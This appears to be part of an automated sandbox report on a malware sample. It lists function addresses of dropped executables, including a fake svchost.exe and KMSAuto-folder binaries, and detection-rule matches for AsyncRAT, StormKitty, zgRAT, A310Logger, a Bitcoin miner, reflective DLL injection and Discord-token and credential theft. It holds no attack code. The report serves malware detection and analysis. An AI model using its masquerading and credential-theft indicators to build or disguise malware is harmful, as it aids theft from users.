Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05714B08	10_2_05714B08
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05712EEF	10_2_05712EEF
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05713441	10_2_05713441
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05710040	10_2_05710040
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05712C00	10_2_05712C00
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_057147C0	10_2_057147C0
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_057147BA	10_2_057147BA
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05710642	10_2_05710642
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05714AF9	10_2_05714AF9
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_057112D8	10_2_057112D8
Source: C:\ProgramData\KMSAuto\accc.exe	Code function: 11_2_00007FFD9B5D0D35	11_2_00007FFD9B5D0D35
Source: C:\ProgramData\KMSAuto\accc.exe	Code function: 11_2_00007FFD9B5D0FA9	11_2_00007FFD9B5D0FA9
Source: C:\ProgramData\KMSAuto\accc.exe	Code function: 11_2_00007FFD9B5D1E50	11_2_00007FFD9B5D1E50
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Code function: 14_2_010F4958	14_2_010F4958
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Code function: 14_2_010F4088	14_2_010F4088
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Code function: 14_2_010F5B20	14_2_010F5B20
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Code function: 14_2_010F3D40	14_2_010F3D40
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Code function: 19_2_00007FFD9B5F31C5	19_2_00007FFD9B5F31C5
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Code function: 19_2_00007FFD9B5F2AFD	19_2_00007FFD9B5F2AFD
Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Code function: 20_2_011CDC74	20_2_011CDC74
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_04D24088	24_2_04D24088
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_04D2B270	24_2_04D2B270
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_04D2CFE8	24_2_04D2CFE8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_04D24958	24_2_04D24958
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_04D25B20	24_2_04D25B20
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_04D2CC78	24_2_04D2CC78
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_04D2CC67	24_2_04D2CC67
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_04D23D40	24_2_04D23D40
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_04D2CFD9	24_2_04D2CFD9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06B34588	24_2_06B34588
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06B34228	24_2_06B34228
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06B34218	24_2_06B34218
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06B341E0	24_2_06B341E0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D1DFA0	24_2_06D1DFA0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D1C4D8	24_2_06D1C4D8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D19C58	24_2_06D19C58
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D132D8	24_2_06D132D8
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D1F3A0	24_2_06D1F3A0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D17B08	24_2_06D17B08
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D16738	24_2_06D16738
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D19140	24_2_06D19140
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D5D450	24_2_06D5D450
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D5D440	24_2_06D5D440
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_07153798	24_2_07153798
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_07153788	24_2_07153788
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_071D5F40	24_2_071D5F40
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_071D9BA0	24_2_071D9BA0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_074783E0	24_2_074783E0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_0747F960	24_2_0747F960
Source: C:\ProgramData\KMSAuto\accc.exe	Code function: 32_2_00007FFD9B5E0D35	32_2_00007FFD9B5E0D35
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA349358	47_2_00007FF6AA349358
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA342430	47_2_00007FF6AA342430
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA348D34	47_2_00007FF6AA348D34
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3514D8	47_2_00007FF6AA3514D8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA33FCE8	47_2_00007FF6AA33FCE8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3329C8	47_2_00007FF6AA3329C8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3409EC	47_2_00007FF6AA3409EC
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3332A8	47_2_00007FF6AA3332A8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3542F8	47_2_00007FF6AA3542F8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA350B24	47_2_00007FF6AA350B24
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA335AC0	47_2_00007FF6AA335AC0
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA350774	47_2_00007FF6AA350774
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA35382C	47_2_00007FF6AA35382C
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA343FC8	47_2_00007FF6AA343FC8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA352FD8	47_2_00007FF6AA352FD8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA338878	47_2_00007FF6AA338878
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA34F100	47_2_00007FF6AA34F100
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3320C0	47_2_00007FF6AA3320C0
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3378F0	47_2_00007FF6AA3378F0
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA344618	47_2_00007FF6AA344618
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA332DBC	47_2_00007FF6AA332DBC
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3426C8	47_2_00007FF6AA3426C8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B032A8	52_2_00007FF7C9B032A8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B029C8	52_2_00007FF7C9B029C8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B02DBC	52_2_00007FF7C9B02DBC
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B078F0	52_2_00007FF7C9B078F0
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B05AC0	52_2_00007FF7C9B05AC0
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B242F8	52_2_00007FF7C9B242F8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B109EC	52_2_00007FF7C9B109EC
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B214D8	52_2_00007FF7C9B214D8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B0FCE8	52_2_00007FF7C9B0FCE8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B12430	52_2_00007FF7C9B12430
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B19358	52_2_00007FF7C9B19358
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B20B24	52_2_00007FF7C9B20B24
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B126C8	52_2_00007FF7C9B126C8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B14618	52_2_00007FF7C9B14618
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B18D34	52_2_00007FF7C9B18D34
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B020C0	52_2_00007FF7C9B020C0
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B1F100	52_2_00007FF7C9B1F100
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B08878	52_2_00007FF7C9B08878
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B2382C	52_2_00007FF7C9B2382C
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B22FD8	52_2_00007FF7C9B22FD8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B13FC8	52_2_00007FF7C9B13FC8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B20774	52_2_00007FF7C9B20774
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4A0774	53_2_00007FF7AE4A0774
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4A2FD8	53_2_00007FF7AE4A2FD8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE493FC8	53_2_00007FF7AE493FC8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE488878	53_2_00007FF7AE488878
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4A382C	53_2_00007FF7AE4A382C
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4878F0	53_2_00007FF7AE4878F0
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE49F100	53_2_00007FF7AE49F100
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4820C0	53_2_00007FF7AE4820C0
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE498D34	53_2_00007FF7AE498D34
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE482DBC	53_2_00007FF7AE482DBC
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE494618	53_2_00007FF7AE494618
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4926C8	53_2_00007FF7AE4926C8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE499358	53_2_00007FF7AE499358
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4A0B24	53_2_00007FF7AE4A0B24
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE492430	53_2_00007FF7AE492430
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE48FCE8	53_2_00007FF7AE48FCE8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4A14D8	53_2_00007FF7AE4A14D8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4909EC	53_2_00007FF7AE4909EC
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4829C8	53_2_00007FF7AE4829C8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4A42F8	53_2_00007FF7AE4A42F8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4832A8	53_2_00007FF7AE4832A8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE485AC0	53_2_00007FF7AE485AC0
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C29C8	55_2_00007FF7C07C29C8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07D09EC	55_2_00007FF7C07D09EC
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C32A8	55_2_00007FF7C07C32A8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C5AC0	55_2_00007FF7C07C5AC0
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07E42F8	55_2_00007FF7C07E42F8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07E0B24	55_2_00007FF7C07E0B24
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07D9358	55_2_00007FF7C07D9358
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07E14D8	55_2_00007FF7C07E14D8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07CFCE8	55_2_00007FF7C07CFCE8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07D2430	55_2_00007FF7C07D2430
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C2DBC	55_2_00007FF7C07C2DBC
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07D8D34	55_2_00007FF7C07D8D34
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07D26C8	55_2_00007FF7C07D26C8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07D4618	55_2_00007FF7C07D4618
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07D3FC8	55_2_00007FF7C07D3FC8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07E2FD8	55_2_00007FF7C07E2FD8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07E0774	55_2_00007FF7C07E0774
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C20C0	55_2_00007FF7C07C20C0
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C78F0	55_2_00007FF7C07C78F0
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07DF100	55_2_00007FF7C07DF100
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07E382C	55_2_00007FF7C07E382C
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C8878	55_2_00007FF7C07C8878

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: String function: 00007FF68A183C1C appears 50 times
Source: C:\Windows\System32\relog.exe	Code function: String function: 00007FF7C07C3C1C appears 50 times
Source: C:\Windows\System32\relog.exe	Code function: String function: 00007FF6AA333C1C appears 50 times
Source: C:\Windows\System32\relog.exe	Code function: String function: 00007FF7AE483C1C appears 50 times
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: String function: 00007FF7C9B03C1C appears 50 times

Source: zbi[1].exe.0.dr	Static PE information: Data appended to the last section found
Source: Service_Mozilla.exe.0.dr	Static PE information: Data appended to the last section found
Source: Service_Skype.exe.0.dr	Static PE information: Data appended to the last section found
Source: Service_com.adobe.dunamis.exe.0.dr	Static PE information: Data appended to the last section found
Source: Service_Adobe.exe.0.dr	Static PE information: Data appended to the last section found
Source: Service_Microsoft.exe.0.dr	Static PE information: Data appended to the last section found

Source: xj40xovMsm.exe	Binary or memory string: OriginalFilename vs xj40xovMsm.exe
Source: xj40xovMsm.exe, 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
Source: xj40xovMsm.exe, 00000000.00000003.1688399097.0000020234F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe
Source: xj40xovMsm.exe, 00000000.00000003.1761409496.0000020236B8F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe
Source: xj40xovMsm.exe, 00000000.00000003.1761409496.0000020235D60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
Source: xj40xovMsm.exe, 00000019.00000003.2608682237.00000229BC80F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe
Source: xj40xovMsm.exe, 00000019.00000003.2408351549.00000229BABA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe
Source: xj40xovMsm.exe, 00000019.00000003.2383701645.00000229B8D87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
Source: xj40xovMsm.exe, 00000019.00000000.2337972315.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
Source: xj40xovMsm.exe, 00000019.00000003.2608682237.00000229BB9E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
Source: xj40xovMsm.exe	Binary or memory string: OriginalFilenameServices.exe: vs xj40xovMsm.exe
Source: xj40xovMsm.exe	Binary or memory string: OriginalFilenameBitcoinMiner.exeV vs xj40xovMsm.exe

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: dump.pcap, type: PCAP	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.explorer.exe.8b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.0.explorer.exe.8cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 2.2.explorer.exe.8cb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.8cb0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.0.explorer.exe.8b90000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.f3c0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.c350000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.0.explorer.exe.c350000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 10.0.4BC4.tmp.Client.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 2.0.explorer.exe.8b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 39.0.jqnnpe.exe.230000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 24.2.svchost.exe.3a15198.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 24.2.svchost.exe.6c60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.explorer.exe.8b90000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 24.2.svchost.exe.6c60000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.0.explorer.exe.8cb0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.2.explorer.exe.c350000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 2.0.explorer.exe.c350000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 24.2.svchost.exe.3a15198.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
